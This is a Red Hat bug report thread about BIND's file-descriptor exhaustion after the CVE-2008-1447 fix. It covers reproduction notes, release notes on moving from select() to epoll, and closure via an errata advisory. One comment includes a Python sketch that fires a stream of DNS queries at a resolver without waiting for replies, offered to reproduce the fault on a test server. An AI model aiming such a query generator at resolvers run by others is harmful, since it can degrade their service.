Description of problem:
The latest security patches have degraded performance on large recursors. When named has to handle about 10000 queries per second, performance is poor and many queries go unanswered. ISC (= upstream) is going to solve this issue in the upcoming 9.3.5-P2 update, so we should apply the patches too.

Version-Release number of selected component (if applicable):
# rpm -q bind
bind-9.3.4-6.0.2.P1.el5_2

How reproducible:
always

Steps to Reproduce:
Quite hard. named has to handle about 10000 queries per second.

Actual results:
Many queries fail due to "too many open file descriptors"

Expected results:
Nearly the same performance as in previous versions

Additional info:
There are many mails about this problem on the bind-users list (http://marc.info/?l=bind-users) and also on the vendor-sec list. Other vendors are also going to release improved versions (at least Debian and Mandriva).

I recommend a rebase to version 9.3.5-P2, which will contain the fix for this issue. It is a maintenance release with many other fixes and no new features. At the very least we should backport the performance fixes from 9.3.5-P2 (but, as I wrote above, using the 9.3.5-P2 code is the better long-term solution).
It does not take 10000 queries per second to reproduce this. I was getting an average of about one "too many open file descriptors" message per minute on a recursive DNS server that receives fewer than 200 queries per second. As far as I can tell, this happens because of queries that time out. It should be reproducible by hitting your test recursor with a bunch of queries for which the authoritative DNS server is unreachable.

This particular fix (noted in the upstream P2 release) may alleviate the "too many open file descriptors" errors in my situation:

2399. [bug] Abort timeout queries to reduce the number of open UDP sockets. [RT #18367]
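A rough sketch of the reproduction idea above, in Python, in case it helps anyone testing. It only sends queries and never waits for answers. The resolver address and zone name in the usage note are placeholders (assumptions, not values from this report); the zone has to be one whose authoritative servers are unreachable from the recursor, so that each query ties up a socket until it times out.

```python
import random
import socket
import struct


def build_query(name, qid):
    """Encode a minimal DNS A-record query in RFC 1035 wire format."""
    # Header: ID, flags (0x0100 = recursion desired), 1 question, no other records.
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    # QNAME: each label is prefixed by its length, terminated by a zero byte.
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.rstrip(".").split(".")
    ) + b"\x00"
    # QTYPE = 1 (A), QCLASS = 1 (IN).
    return header + qname + struct.pack("!HH", 1, 1)


def send_queries(resolver, zone, count, port=53):
    """Fire `count` queries for distinct names under `zone` at `resolver`.

    Distinct names keep the recursor's cache from absorbing the load.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        for i in range(count):
            packet = build_query(f"host{i}.{zone}", random.randrange(65536))
            sock.sendto(packet, (resolver, port))
    finally:
        sock.close()
```

Hypothetical usage against a test recursor: `send_queries("192.0.2.53", "unreachable.example", 5000)`, then watch the named log for the "too many open file descriptors" message.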
Rebased to 9.3.6-P1.
Release note added. If any revisions are required, please set the "requires_release_notes" flag to "?" and edit the "Release Notes" field accordingly. All revisions will be proofread by the Engineering Content Services team.

New Contents:

Cause:
=======
The fix for CVE-2008-1447 changed the internal socket management logic, so named needs more sockets open simultaneously than before. The select() system call cannot handle that many open descriptors.

Consequence:
============
When server load rises to approximately 1000 queries per second, messages like "too many open file descriptors" appear in the log and named fails to handle further incoming queries.

Fix:
====
The internal socket infrastructure has been reworked. The select() system call has been replaced by the epoll infrastructure.

Result:
=======
BIND is able to handle a far larger number of queries simultaneously.
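For readers unfamiliar with the difference: select() can only watch descriptors numbered below FD_SETSIZE (typically 1024 on Linux), while epoll has no such fixed ceiling. The sketch below is not BIND's code. It is a small Python illustration, assuming Linux, where the standard `selectors.DefaultSelector` is backed by epoll; the function name `wait_for_replies` is made up for this example.

```python
import selectors


def wait_for_replies(socks, timeout=1.0):
    """Return the sockets from `socks` that become readable within `timeout`.

    On Linux, DefaultSelector uses epoll, so the number of watched sockets
    is not capped by select()'s FD_SETSIZE limit.
    """
    sel = selectors.DefaultSelector()
    try:
        for s in socks:
            sel.register(s, selectors.EVENT_READ)
        return [key.fileobj for key, _events in sel.select(timeout)]
    finally:
        sel.close()
```

A resolver-style loop would register one socket per outstanding query and call something like this repeatedly; with select() the same loop starts failing once descriptor numbers pass the FD_SETSIZE limit.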
Release note updated. If any revisions are required, please set the "requires_release_notes" flag to "?" and edit the "Release Notes" field accordingly. All revisions will be proofread by the Engineering Content Services team.

Diffed Contents:

@@ -12,4 +12,6 @@
 Result:
 =======
-BIND is able to handle a far larger number of queries simultaneously.
+BIND is able to handle a far larger number of queries simultaneously.
+
+For a complete list of bug fixes, check /usr/share/doc/bind-*/CHANGES
~~ Attention - RHEL 5.4 Beta Released! ~~ RHEL 5.4 Beta has been released! There should be a fix present in the Beta release that addresses this particular request. Please test and report back results here, at your earliest convenience. RHEL 5.4 General Availability release is just around the corner! If you encounter any issues while testing Beta, please describe the issues you have encountered and set the bug into NEED_INFO. If you encounter new issues, please clone this bug to open a new issue and request it be reviewed for inclusion in RHEL 5.4 or a later update, if it is not of urgent severity. Please do not flip the bug status to VERIFIED. Only post your verification results, and if available, update Verified field with the appropriate value. Questions can be posted to this bug or your customer or partner representative.
An advisory has been issued which should help the problem described in this bug report. This report is therefore being closed with a resolution of ERRATA. For more information on the solution and/or where to find the updated files, please follow the link below. You may reopen this bug report if the solution does not work for you.

http://rhn.redhat.com/errata/RHBA-2009-1420.html